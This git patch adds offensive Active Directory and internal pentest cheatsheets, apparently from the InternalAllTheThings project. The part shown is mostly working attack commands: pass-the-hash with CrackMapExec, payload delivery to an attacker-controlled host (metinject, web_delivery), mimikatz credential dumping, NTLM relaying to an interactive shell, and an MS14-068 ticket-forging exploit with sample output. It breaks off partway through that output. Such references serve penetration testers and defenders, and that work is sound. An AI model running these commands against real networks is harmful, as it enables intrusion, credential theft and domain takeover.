From 53dd66c6e34ee8daba08ccefb929f5f6cc88f837 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 17 Nov 2023 12:56:44 +0100 Subject: [PATCH] PATT Migration - v0.1 --- docs/README.md | 21 +- .../Active Directory Attack.md | 4501 +++++++++++++++++ docs/cloud/C.md | 1 - docs/cloud/aws/Cloud - AWS Pentest.md | 2410 +++++++++ docs/cloud/aws/todo.md | 1 + docs/cloud/azure/Cloud - Azure Pentest.md | 1230 +++++ .../{test/B.md => azure/access-and-token.md} | 0 docs/cloud/azure/azure-services.md | 0 .../cloud/{test/A.md => azure/enumeration.md} | 0 .../Cobalt Strike - Cheatsheet.md | 491 ++ .../Metasploit - Cheatsheet.md | 234 + docs/containers/Container - Docker Pentest.md | 250 + .../Container - Kubernetes Pentest.md | 67 + .../Methodology and enumeration.md | 149 + docs/methodology/Vulnerability Reports.md | 52 + docs/pentest/Bind Shell Cheatsheet.md | 95 + docs/pentest/Escape Breakout.md | 152 + docs/pentest/Hash Cracking.md | 169 + docs/pentest/Linux - Privilege Escalation.md | 832 +++ docs/pentest/MSSQL Server - Cheatsheet.md | 676 +++ docs/pentest/Miscellaneous - Tricks.md | 27 + docs/pentest/Network Discovery.md | 256 + docs/pentest/Network Pivoting Techniques.md | 503 ++ docs/pentest/Powershell - Cheatsheet.md | 333 ++ docs/pentest/Reverse Shell Cheatsheet.md | 620 +++ docs/pentest/Source Code Management.md | 133 + .../pentest/Windows - Privilege Escalation.md | 1536 ++++++ docs/redteam/HTML Smuggling.md | 43 + docs/redteam/Linux - Evasion.md | 120 + docs/redteam/Linux - Persistence.md | 237 + docs/redteam/Office - Attacks.md | 747 +++ docs/redteam/Windows - AMSI Bypass.md | 778 +++ docs/redteam/Windows - DPAPI.md | 100 + docs/redteam/Windows - Defenses.md | 421 ++ .../redteam/Windows - Download and Execute.md | 122 + docs/redteam/Windows - Mimikatz.md | 318 ++ docs/redteam/Windows - Persistence.md | 629 +++ docs/redteam/Windows - Using credentials.md | 394 ++ docs/redteam/attack-surface-enumeration.md | 203 + docs/redteam/initial-access.md | 190 + 40 files changed, 19039 insertions(+), 2 
deletions(-) create mode 100644 docs/active-directory/Active Directory Attack.md delete mode 100644 docs/cloud/C.md create mode 100644 docs/cloud/aws/Cloud - AWS Pentest.md create mode 100644 docs/cloud/aws/todo.md create mode 100644 docs/cloud/azure/Cloud - Azure Pentest.md rename docs/cloud/{test/B.md => azure/access-and-token.md} (100%) create mode 100644 docs/cloud/azure/azure-services.md rename docs/cloud/{test/A.md => azure/enumeration.md} (100%) create mode 100644 docs/command-control/Cobalt Strike - Cheatsheet.md create mode 100644 docs/command-control/Metasploit - Cheatsheet.md create mode 100644 docs/containers/Container - Docker Pentest.md create mode 100644 docs/containers/Container - Kubernetes Pentest.md create mode 100644 docs/methodology/Methodology and enumeration.md create mode 100644 docs/methodology/Vulnerability Reports.md create mode 100644 docs/pentest/Bind Shell Cheatsheet.md create mode 100644 docs/pentest/Escape Breakout.md create mode 100644 docs/pentest/Hash Cracking.md create mode 100644 docs/pentest/Linux - Privilege Escalation.md create mode 100644 docs/pentest/MSSQL Server - Cheatsheet.md create mode 100644 docs/pentest/Miscellaneous - Tricks.md create mode 100644 docs/pentest/Network Discovery.md create mode 100644 docs/pentest/Network Pivoting Techniques.md create mode 100644 docs/pentest/Powershell - Cheatsheet.md create mode 100644 docs/pentest/Reverse Shell Cheatsheet.md create mode 100644 docs/pentest/Source Code Management.md create mode 100644 docs/pentest/Windows - Privilege Escalation.md create mode 100644 docs/redteam/HTML Smuggling.md create mode 100644 docs/redteam/Linux - Evasion.md create mode 100644 docs/redteam/Linux - Persistence.md create mode 100644 docs/redteam/Office - Attacks.md create mode 100644 docs/redteam/Windows - AMSI Bypass.md create mode 100644 docs/redteam/Windows - DPAPI.md create mode 100644 docs/redteam/Windows - Defenses.md create mode 100644 docs/redteam/Windows - Download and Execute.md create 
mode 100644 docs/redteam/Windows - Mimikatz.md create mode 100644 docs/redteam/Windows - Persistence.md create mode 100644 docs/redteam/Windows - Using credentials.md create mode 100644 docs/redteam/attack-surface-enumeration.md create mode 100644 docs/redteam/initial-access.md diff --git a/docs/README.md b/docs/README.md index dd6974f..0176c2e 100644 --- a/docs/README.md +++ b/docs/README.md @@ -1 +1,20 @@ -# Welcome \ No newline at end of file +# InternalAllTheThings + +Active Directory and Internal Pentest Cheatsheets + + +

+ +

+ + +📖 Documentation +----- + +TODO + + +👨‍💻 Contributions +----- + +TODO \ No newline at end of file diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md new file mode 100644 index 0000000..a9b5d5b --- /dev/null +++ b/docs/active-directory/Active Directory Attack.md 
@@ -0,0 +1,4501 @@ +# Active Directory Attacks + +## Summary + +- [Active Directory Attacks](#active-directory-attacks) + - [Summary](#summary) + - [Tools](#tools) + - [Kerberos Clock Synchronization](#kerberos-clock-synchronization) + - [Active Directory Recon](#active-directory-recon) + - [Using BloodHound](#using-bloodhound) + - [Using PowerView](#using-powerview) + - [Using AD Module](#using-ad-module) + - [From CVE to SYSTEM shell on DC](#from-cve-to-system-shell-on-dc) + - [MS14-068 Checksum Validation](#ms14-068-checksum-validation) + - [ZeroLogon](#zerologon) + - [PrintNightmare](#printnightmare) + - [samAccountName spoofing](#samaccountname-spoofing) + - [Open Shares](#open-shares) + - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) + - [SCF Files](#scf-files) + - [URL Files](#url-files) + - [Windows Library Files](#windows-library-files) + - [Windows Search Connectors Files](#windows-search-connectors-files) + - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) + - [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo) + - [Find vulnerable GPO](#find-vulnerable-gpo) + - [Abuse GPO with SharpGPOAbuse](#abuse-gpo-with-sharpgpoabuse) + - [Abuse GPO with PowerGPOAbuse](#abuse-gpo-with-powergpoabuse) + - [Abuse GPO with pyGPOAbuse](#abuse-gpo-with-pygpoabuse) + - [Abuse GPO with PowerView](#abuse-gpo-with-powerview) + - [Abuse GPO with StandIn](#abuse-gpo-with-standin) + - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) + - [DCSync Attack](#dcsync-attack) + - [Volume Shadow Copy](#volume-shadow-copy) + - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit) + - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) + - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) + - [NTDS Reversible Encryption](#ntds-reversible-encryption) + - [User Hunting](#user-hunting) + - [Password spraying](#password-spraying) + - 
[Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) + - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) + - [Spray passwords against the RDP service](#spray-passwords-against-the-rdp-service) + - [BadPwdCount attribute](#badpwdcount-attribute) + - [Password in AD User comment](#password-in-ad-user-comment) + - [Password of Pre-Created Computer Account](#password-of-pre-created-computer-account) + - [Reading LAPS Password](#reading-laps-password) + - [Reading GMSA Password](#reading-gmsa-password) + - [Forging Golden GMSA](#forging-golden-gmsa) + - [Kerberos Tickets](#kerberos-tickets) + - [Dump Kerberos Tickets](#dump-kerberos-tickets) + - [Replay Kerberos Tickets](#replay-kerberos-tickets) + - [Convert Kerberos Tickets](#convert-kerberos-tickets) + - [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) + - [Using Mimikatz](#using-mimikatz) + - [Using Meterpreter](#using-meterpreter) + - [Using a ticket on Linux](#using-a-ticket-on-linux) + - [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) + - [Pass-the-Ticket Diamond Tickets](#pass-the-ticket-diamond-tickets) + - [Pass-the-Ticket Sapphire Tickets](#pass-the-ticket-sapphire-tickets) + - [Kerberoasting](#kerberoasting) + - [KRB_AS_REP Roasting](#krb_as_rep-roasting) + - [Kerberoasting w/o domain account](#kerberoasting-wo-domain-account) + - [CVE-2022-33679](#cve-2022-33679) + - [Timeroasting](#timeroasting) + - [Pass-the-Hash](#pass-the-hash) + - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) + - [Using impacket](#using-impacket) + - [Using Rubeus](#using-rubeus) + - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) + - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) + - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) + - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + - [LDAP signing 
not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled) + - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) + - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6) + - [Drop the MIC](#drop-the-mic) + - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) + - [RemotePotato0 DCOM DCE RPC relay](#remotepotato0-dcom-dce-rpc-relay) + - [DNS Poisonning - Relay delegation with mitm6](#dns-poisonning---relay-delegation-with-mitm6) + - [Relaying with WebDav Trick](#relaying-with-webdav-trick) + - [Active Directory Certificate Services](#active-directory-certificate-services) + - [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates) + - [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates) + - [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates) + - [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities) + - [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2) + - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control) + - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack) + - [ESC9 - No Security Extension](#esc9---no-security-extension) + - [ESC11 - Relaying NTLM to ICPR](#esc11---relaying-ntlm-to-icpr) + - [Certifried CVE-2022-26923](#certifried-cve-2022-26923) + - [Pass-The-Certificate](#pass-the-certificate) + - [UnPAC The Hash](#unpac-the-hash) + - [Shadow Credentials](#shadow-credentials) + - [Active Directory Groups](#active-directory-groups) + - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) + - [Abusing DNS Admins Group](#abusing-dns-admins-group) + - [Abusing Schema Admins Group](#abusing-schema-admins-group) + - [Abusing Backup Operators Group](#abusing-backup-operators-group) + - [Active Directory Federation 
Services](#active-directory-federation-services) + - [ADFS - Golden SAML](#adfs---golden-saml) + - [Active Directory Integrated DNS](#active-directory-integrated-dns) + - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [GenericWrite and Remote Connection Manager](#genericwrite-and-remote-connection-manager) + - [WriteDACL](#writedacl) + - [WriteOwner](#writeowner) + - [ReadLAPSPassword](#readlapspassword) + - [ReadGMSAPassword](#readgmsapassword) + - [ForceChangePassword](#forcechangepassword) + - [DCOM Exploitation](#dcom-exploitation) + - [DCOM via MMC Application Class](#dcom-via-mmc-application-class) + - [DCOM via Excel](#dcom-via-excel) + - [DCOM via ShellExecute](#dcom-via-shellexecute) + - [Trust relationship between domains](#trust-relationship-between-domains) + - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) + - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) + - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) + - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) + - [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation) + - [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation) + - [Kerberos Constrained Delegation](#kerberos-constrained-delegation) + - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) + - [Kerberos Service for User Extension](#kerberos-service-for-user-extension) + - [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation) + - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) + - [PrivExchange attack](#privexchange-attack) + - [SCCM Deployment](#sccm-deployment) + - [SCCM Network Access 
Accounts](#sccm-network-access-accounts) + - [SCCM Shares](#sccm-shares) + - [WSUS Deployment](#wsus-deployment) + - [RODC - Read Only Domain Controller](#rodc---read-only-domain-controller) + - [RODC Golden Ticket](#rodc-golden-ticket) + - [RODC Key List Attack](#rodc-key-list-attack) + - [RODC Computer Object](#rodc-computer-object) + - [PXE Boot image attack](#pxe-boot-image-attack) + - [DSRM Credentials](#dsrm-credentials) + - [DNS Reconnaissance](#dns-reconnaissance) + - [Linux Active Directory](#linux-active-directory) + - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) + - [CCACHE ticket reuse from keyring](#ccache-ticket-reuse-from-keyring) + - [CCACHE ticket reuse from SSSD KCM](#ccache-ticket-reuse-from-sssd-kcm) + - [CCACHE ticket reuse from keytab](#ccache-ticket-reuse-from-keytab) + - [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etckrb5keytab) + - [Extract accounts from /etc/sssd/sssd.conf](#extract-accounts-from-etcsssdsssdconf) + - [References](#references) + +## Tools + +* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) +* [Responder](https://github.com/lgandx/Responder) +* [InveighZero](https://github.com/Kevin-Robertson/InveighZero) +* [Mimikatz](https://github.com/gentilkiwi/mimikatz) +* [Ranger](https://github.com/funkandwagnalls/ranger) +* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) +* [CrackMapExec](https://github.com/mpgn/CrackMapExec) + + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/mpgn/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) 
+ root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 + ``` + +* [Mitm6](https://github.com/fox-it/mitm6.git) + + ```bash + git clone https://github.com/fox-it/mitm6.git && cd mitm6 + pip install . 
+ mitm6 -d lab.local + ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i + # -wh: Server hosting WPAD file (Attacker’s IP) + # -t: Target (You cannot relay credentials to the same device that you’re spoofing) + # -i: open an interactive shell + ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access + ``` + +* [ADRecon](https://github.com/sense-of-security/ADRecon) + + ```powershell + .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser + ``` + +* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) + + ```powershell + powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 + ``` + +* [Ping Castle](https://github.com/vletoux/pingcastle) + + ```powershell + pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession + pingcastle.exe --healthcheck --server domain.local + pingcastle.exe --graph --server domain.local + pingcastle.exe --scanner scanner_name --server domain.local + available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users + ``` + +* [Kerbrute](https://github.com/ropnop/kerbrute) + + ```powershell + ./kerbrute passwordspray -d + ``` + +* [Rubeus](https://github.com/GhostPack/Rubeus) + + ```powershell + Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid] + Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID] + Rubeus.exe klist [/luid:LOGINID] + Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] + ``` + +* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) + ```powershell + New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV + Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' + Install-Lab + Show-LabDeploymentSummary + ``` + + 
+## Kerberos Clock Synchronization + +In Kerberos, time is used to ensure that tickets are valid. To achieve this, the clocks of all Kerberos clients and servers in a realm must be synchronized to within a certain tolerance. The default clock skew tolerance in Kerberos is `5 minutes`, which means that the difference in time between the clocks of any two Kerberos entities should be no more than 5 minutes. + + +* Detect clock skew automatically with `nmap` + ```powershell + $ nmap -sV -sC 10.10.10.10 + clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s + ``` +* Compute yourself the difference between the clocks + ```ps1 + nmap -sT 10.10.10.10 -p445 --script smb2-time -vv + ``` +* Fix #1: Modify your clock + ```ps1 + sudo date -s "14 APR 2015 18:25:16" # Linux + net time /domain /set # Windows + ``` +* Fix #2: Fake your clock + ```ps1 + faketime -f '+8h' date + ``` + + +## Active Directory Recon + +### Using BloodHound + +Use the correct collector +* AzureHound for Azure Active Directory +* SharpHound for local Active Directory +* RustHound for local Active Directory + +* use [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) (more info: [Cloud - Azure Pentest](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest.md#azure-recon-tools)) + +* use [BloodHoundAD/BloodHound](https://github.com/BloodHoundAD/BloodHound) + ```powershell + # run the collector on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe + .\SharpHound.exe -c all -d active.htb --searchforest + .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default + .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy) + + .\SharpHound.exe -c all --LdapUsername --LdapPassword 
--JSONFolder + .\SharpHound.exe -c all --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 -d active.htb + .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 + + # or run the collector on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 + # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 + Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py + pip install bloodhound + bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all + + # or locally/remotely from an ADExplorer snapshot from SysInternals (ADExplorer remains a legitimate binary signed by Microsoft, avoiding detection with security solutions) + # https://github.com/c3c/ADExplorerSnapshot.py + pip3 install --user . 
+ ADExplorerSnapshot.py -o <*.json output folder path> + ``` +* Collect more data for certificates exploitation using Certipy + ```ps1 + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -old-bloodhound + certipy find 'corp.local/john:Passw0rd@dc.corp.local' -vulnerable -hide-admins -username user@domain -password Password123 + ``` +* use [OPENCYBER-FR/RustHound](https://github.com/OPENCYBER-FR/RustHound) + ```ps1 + # Windows with GSSAPI session + rusthound.exe -d domain.local --ldapfqdn domain + # Windows/Linux simple bind connection username:password + rusthound.exe -d domain.local -u user@domain.local -p Password123 -o output -z + # Linux with username:password and ADCS module for @ly4k BloodHound version + rusthound -d domain.local -u 'user@domain.local' -p 'Password123' -o /tmp/adcs --adcs -z + ``` + +Then import the zip/json files into the Neo4J database and query them. + +```powershell +root@payload$ apt install bloodhound + +# start BloodHound and the database +root@payload$ neo4j console +# or use docker +root@payload$ docker run -itd -p 7687:7687 -p 7474:7474 --env NEO4J_AUTH=neo4j/bloodhound -v $(pwd)/neo4j:/data neo4j:4.4-community + +root@payload$ ./bloodhound --no-sandbox +Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j +``` + +You can add some custom queries like : +* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) +* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json) +* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json) +* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json) + +Replace the customqueries.json file located at 
`/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`. + + +### Using PowerView + +- **Get Current Domain:** `Get-NetDomain` +- **Enum Other Domains:** `Get-NetDomain -Domain ` +- **Get Domain SID:** `Get-DomainSID` +- **Get Domain Policy:** + ```powershell + Get-DomainPolicy + + #Will show us the policy configurations of the Domain about system access or kerberos + (Get-DomainPolicy)."system access" + (Get-DomainPolicy)."kerberos policy" + ``` +- **Get Domain Controlers:** + ```powershell + Get-NetDomainController + Get-NetDomainController -Domain + ``` +- **Enumerate Domain Users:** + ```powershell + Get-NetUser + Get-NetUser -SamAccountName + Get-NetUser | select cn + Get-UserProperty + + #Check last password change + Get-UserProperty -Properties pwdlastset + + #Get a specific "string" on a user's attribute + Find-UserField -SearchField Description -SearchTerm "wtver" + + #Enumerate user logged on a machine + Get-NetLoggedon -ComputerName + + #Enumerate Session Information for a machine + Get-NetSession -ComputerName + + #Enumerate domain machines of the current/specified domain where specific users are logged into + Find-DomainUserLocation -Domain | Select-Object UserName, SessionFromName + ``` +- **Enum Domain Computers:** + ```powershell + Get-NetComputer -FullData + Get-DomainGroup + + #Enumerate Live machines + Get-NetComputer -Ping + ``` +- **Enum Groups and Group Members:** + ```powershell + Get-NetGroupMember -GroupName "" -Domain + + #Enumerate the members of a specified group of the domain + Get-DomainGroup -Identity | Select-Object -ExpandProperty Member + + #Returns all GPOs in a domain that modify local group memberships through Restricted Groups or Group Policy Preferences + Get-DomainGPOLocalGroup | Select-Object GPODisplayName, GroupName + ``` +- **Enumerate Shares** + ```powershell + #Enumerate Domain Shares + Find-DomainShare + + #Enumerate Domain Shares the current user has 
access + Find-DomainShare -CheckShareAccess + ``` +- **Enum Group Policies:** + ```powershell + Get-NetGPO + + # Shows active Policy on specified machine + Get-NetGPO -ComputerName + Get-NetGPOGroup + + #Get users that are part of a Machine's local Admin group + Find-GPOComputerAdmin -ComputerName + ``` +- **Enum OUs:** + ```powershell + Get-NetOU -FullData + Get-NetGPO -GPOname + ``` +- **Enum ACLs:** + ```powershell + # Returns the ACLs associated with the specified account + Get-ObjectAcl -SamAccountName -ResolveGUIDs + Get-ObjectAcl -ADSprefix 'CN=Administrator, CN=Users' -Verbose + + #Search for interesting ACEs + Invoke-ACLScanner -ResolveGUIDs + + #Check the ACLs associated with a specified path (e.g smb share) + Get-PathAcl -Path "\\Path\Of\A\Share" + ``` +- **Enum Domain Trust:** + ```powershell + Get-NetDomainTrust + Get-NetDomainTrust -Domain + ``` +- **Enum Forest Trust:** + ```powershell + Get-NetForestDomain + Get-NetForestDomain Forest + + #Domains of Forest Enumeration + Get-NetForestDomain + Get-NetForestDomain Forest + + #Map the Trust of the Forest + Get-NetForestTrust + Get-NetDomainTrust -Forest + ``` +- **User Hunting:** + ```powershell + #Finds all machines on the current domain where the current user has local admin access + Find-LocalAdminAccess -Verbose + + #Find local admins on all machines of the domain: + Invoke-EnumerateLocalAdmin -Verbose + + #Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + + #Confirming admin access: + Invoke-UserHunter -CheckAccess + ``` + :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ + I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> + Profit! 
+ + [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) + +### Using AD Module + +- **Get Current Domain:** `Get-ADDomain` +- **Enum Other Domains:** `Get-ADDomain -Identity ` +- **Get Domain SID:** `Get-DomainSID` +- **Get Domain Controlers:** + + ```powershell + Get-ADDomainController + Get-ADDomainController -Identity + ``` + +- **Enumerate Domain Users:** + ```powershell + Get-ADUser -Filter * -Identity -Properties * + + #Get a specific "string" on a user's attribute + Get-ADUser -Filter 'Description -like "*wtver*"' -Properties Description | select Name, Description + ``` +- **Enum Domain Computers:** + ```powershell + Get-ADComputer -Filter * -Properties * + Get-ADGroup -Filter * + ``` +- **Enum Domain Trust:** + ```powershell + Get-ADTrust -Filter * + Get-ADTrust -Identity + ``` +- **Enum Forest Trust:** + ```powershell + Get-ADForest + Get-ADForest -Identity + + #Domains of Forest Enumeration + (Get-ADForest).Domains + ``` + - **Enum Local AppLocker Effective Policy:** + ```powershell + Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections + ``` + +### Other Interesting Commands + +- **Find Domain Controllers** + ```ps1 + nslookup domain.com + nslookup -type=srv _ldap._tcp.dc._msdcs..com + nltest /dclist:domain.com + Get-ADDomainController -filter * | Select-Object name + gpresult /r + $Env:LOGONSERVER + echo %LOGONSERVER% + ``` + + +## From CVE to SYSTEM shell on DC + +> Sometimes you will find a Domain Controller without the latest patches installed, use the newest CVE to gain a SYSTEM shell on it. 
If you have a "normal user" shell on the DC you can also try to elevate your privileges using one of the methods listed in [Windows - Privilege Escalation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md) + + +### MS14-068 Checksum Validation + +This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine. + +* RPCClient + ```powershell + rpcclient $> lookupnames john.smith + john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1) + ``` +* WMI + ```powershell + wmic useraccount get name,sid + Administrator S-1-5-21-3415849876-833628785-5197346142-500 + Guest S-1-5-21-3415849876-833628785-5197346142-501 + Administrator S-1-5-21-297520375-2634728305-5197346142-500 + Guest S-1-5-21-297520375-2634728305-5197346142-501 + krbtgt S-1-5-21-297520375-2634728305-5197346142-502 + lambda S-1-5-21-297520375-2634728305-5197346142-1110 + ``` +* Powerview + ```powershell + Convert-NameToSid high-sec-corp.localkrbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + ``` +* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid` + +```bash +Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068 +``` + +Generate a ticket with `metasploit` or `pykek` + +```powershell +Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum + Name Current Setting Required Description + ---- --------------- -------- ----------- + DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL + PASSWORD P@ssw0rd yes The Domain User password + RHOSTS 10.10.10.10 yes The target address range or CIDR identifier + RPORT 88 yes The target port + Timeout 10 yes The TCP timeout to establish connection and read data + USER lambda yes The Domain User + USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000 +``` + +```powershell +# 
Alternative download: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek +$ git clone https://github.com/SecWiki/windows-kernel-exploits +$ python ./ms14-068.py -u @ -s -d -p +$ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org +$ python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10 +$ python ms14-068.py -u user01@metasploitable.local -d msfdc01.metasploitable.local -p Password1 -s S-1-5-21-2928836948-3642677517-2073454066 +-1105 + [+] Building AS-REQ for msfdc01.metasploitable.local... Done! + [+] Sending AS-REQ to msfdc01.metasploitable.local... Done! + [+] Receiving AS-REP from msfdc01.metasploitable.local... Done! + [+] Parsing AS-REP from msfdc01.metasploitable.local... Done! + [+] Building TGS-REQ for msfdc01.metasploitable.local... Done! + [+] Sending TGS-REQ to msfdc01.metasploitable.local... Done! + [+] Receiving TGS-REP from 